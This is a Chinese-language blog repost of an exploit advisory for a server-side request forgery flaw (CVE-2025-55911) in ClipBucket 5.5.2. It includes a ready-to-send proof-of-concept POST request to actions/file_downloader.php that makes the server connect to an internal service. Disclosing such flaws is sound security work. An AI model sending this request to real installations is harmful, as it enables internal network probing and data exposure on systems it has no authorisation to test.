ClipBucket 5.5.2 SSRF漏洞分析与利用详解

本文详细分析了ClipBucket 5.5.2 Build

漏洞标题:ClipBucket 5.5.2 Build #90 - 服务器端请求伪造(SSRF)

Google搜索语法:不适用

日期:2025-09-11

漏洞作者:Mukundsinh Solanki (r00td3str0y3r)

厂商主页:https://clipbucket.com

软件链接:https://github.com/MacWarrior/clipbucket-v5

版本:5.5.2 Build #90

测试环境:Ubuntu 20.04 LTS, PHP 7.4

CVE:CVE-2025-55911

漏洞描述:

拥有常规权限的认证用户可以通过actions/file_downloader.php中的file参数利用服务器端请求伪造(SSRF)漏洞。通过提供精心构造的URL,攻击者可以强制服务器向内部服务或外部系统发出任意HTTP请求。这可能导致内部网络枚举、数据泄露或跳板攻击。

概念验证请求:

1
2
3
4
5
6
POST /upload/actions/file_downloader.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=validsession

file=http://127.0.0.1:3306/test.mp4

服务器尝试连接到内部服务(127.0.0.1:3306),证明了SSRF漏洞的存在。

影响:

  • 内部服务枚举
  • 潜在的元数据泄露
  • 向内部系统进行跳板攻击

致谢, Mukundsinh Solanki +916355251151

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计